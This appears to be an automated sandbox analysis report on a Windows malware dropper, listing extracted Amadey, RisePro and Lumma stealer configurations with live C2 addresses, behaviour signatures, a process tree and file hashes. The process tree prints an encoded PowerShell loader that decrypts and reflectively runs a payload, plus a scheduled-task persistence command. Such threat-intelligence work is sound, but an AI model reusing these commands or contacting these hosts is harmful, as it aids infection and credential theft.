Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 17:20

General

  • Target

    2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe

  • Size

    1.8MB

  • MD5

    a545015277adb79890693c2aa95bd1ad

  • SHA1

    64d174ec5dedfc9e25887213221fb171707ef8a7

  • SHA256

    2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205

  • SHA512

    560e9f3bc48a8e40133336f320feb22774c0da73c6947af4a159b881086ab07d60326f63c4cd41041fee23b9223188243ce1a121cdb200751ef068bf9499eb37

  • SSDEEP

    49152:ZpvNociR3yxx1JLSYwy9AdBVoHwVC5Sm2EfR/kCN:dOgDhSThxkFDS

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

lumma

C2

https://smallelementyjdui.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://tendencyportionjsuk.shop/api

https://headraisepresidensu.shop/api

https://appetitesallooonsj.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 13 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe
    "C:\Users\Admin\AppData\Local\Temp\2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:2060
        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4976
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3052
            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
              "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3180
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:2288
              • C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
                "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1776
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAHIAawAxAGsAMgBzAGwAMwBrAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA=="
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3160
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAHIAawAxAGsAMgBzAGwAMwBrAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA==
                    7⤵
                    • Suspicious use of SetThreadContext
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1748
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      8⤵
                      • Checks computer location settings
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1268
                      • C:\Users\Admin\Pictures\55hXfWg1qZszuDybS5qUeTwg.exe
                        "C:\Users\Admin\Pictures\55hXfWg1qZszuDybS5qUeTwg.exe"
                        9⤵
                        • Executes dropped EXE
                        PID:4856
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1336
                      • C:\Users\Admin\Pictures\c32VbdEYRsdEsPrNP8QUGh7r.exe
                        "C:\Users\Admin\Pictures\c32VbdEYRsdEsPrNP8QUGh7r.exe"
                        9⤵
                        • Executes dropped EXE
                        PID:452
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1252
                      • C:\Users\Admin\Pictures\ykXx40b57sFbCzwNvVKAiQFS.exe
                        "C:\Users\Admin\Pictures\ykXx40b57sFbCzwNvVKAiQFS.exe"
                        9⤵
                        • Executes dropped EXE
                        PID:4024
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:448
                      • C:\Users\Admin\Pictures\UFQnVOvaLK3pNgTPUJBUc789.exe
                        "C:\Users\Admin\Pictures\UFQnVOvaLK3pNgTPUJBUc789.exe"
                        9⤵
                        • Executes dropped EXE
                        PID:2188
                        • C:\Users\Admin\AppData\Local\Temp\u1os.0.exe
                          "C:\Users\Admin\AppData\Local\Temp\u1os.0.exe"
                          10⤵
                            PID:2924
                        • C:\Users\Admin\Pictures\8vAuHCIvORJJMbSj46MehyUu.exe
                          "C:\Users\Admin\Pictures\8vAuHCIvORJJMbSj46MehyUu.exe"
                          9⤵
                          • Executes dropped EXE
                          PID:2344
                        • C:\Users\Admin\Pictures\qHVLqqVHQ2ZDeiOYS1BMiFNe.exe
                          "C:\Users\Admin\Pictures\qHVLqqVHQ2ZDeiOYS1BMiFNe.exe"
                          9⤵
                            PID:3316
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                          8⤵
                            PID:2588
                    • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                      5⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4884
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                        6⤵
                        • Creates scheduled task(s)
                        PID:4560
                      • C:\Users\Admin\AppData\Local\Temp\1000254001\ISetup8.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000254001\ISetup8.exe"
                        6⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2128
                        • C:\Users\Admin\AppData\Local\Temp\u1n4.0.exe
                          "C:\Users\Admin\AppData\Local\Temp\u1n4.0.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4608
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 2124
                            8⤵
                            • Program crash
                            PID:3660
                        • C:\Users\Admin\AppData\Local\Temp\u1n4.1.exe
                          "C:\Users\Admin\AppData\Local\Temp\u1n4.1.exe"
                          7⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:5064
                          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                            8⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2820
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 1548
                          7⤵
                          • Program crash
                          PID:2508
                      • C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe"
                        6⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:2004
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 352
                          7⤵
                          • Program crash
                          PID:5032
                      • C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4976
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2836
                        • C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:4436
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4796
                • C:\Users\Admin\1000006002\2649a27fea.exe
                  "C:\Users\Admin\1000006002\2649a27fea.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  PID:3820
                • C:\Users\Admin\AppData\Local\Temp\1000011001\installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000011001\installer.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1668
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3452,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4444 /prefetch:8
              1⤵
                PID:3720
              • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                1⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:1956
              • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                1⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:896
              • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                1⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:3084
              • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                1⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:3528
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2004 -ip 2004
                1⤵
                  PID:4356
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2128 -ip 2128
                  1⤵
                    PID:4348
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2432,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:3
                    1⤵
                      PID:648
                    • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                      C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:1200
                    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                      C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:440
                    • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                      C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                      1⤵
                        PID:396
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4608 -ip 4608
                        1⤵
                          PID:2228
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                          1⤵
                            PID:1148
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                            1⤵
                              PID:4464

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\Are.docx

                              Filesize

                              11KB

                              MD5

                              a33e5b189842c5867f46566bdbf7a095

                              SHA1

                              e1c06359f6a76da90d19e8fd95e79c832edb3196

                              SHA256

                              5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                              SHA512

                              f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                            • C:\ProgramData\mozglue.dll

                              Filesize

                              593KB

                              MD5

                              c8fd9be83bc728cc04beffafc2907fe9

                              SHA1

                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                              SHA256

                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                              SHA512

                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                            • C:\ProgramData\nss3.dll

                              Filesize

                              2.0MB

                              MD5

                              1cc453cdf74f31e4d913ff9c10acdde2

                              SHA1

                              6e85eae544d6e965f15fa5c39700fa7202f3aafe

                              SHA256

                              ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                              SHA512

                              dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                            • C:\Users\Admin\1000006002\2649a27fea.exe

                              Filesize

                              2.1MB

                              MD5

                              ba7a6e2153260b9b3acc44afc052354a

                              SHA1

                              8c3c64aceb59f36d4cae124961c71b1dd7e7e8de

                              SHA256

                              b1dc825eb3cb0d4cb5a09168d33df436ed151f29eef926c274c9a7cf1b8bb6a3

                              SHA512

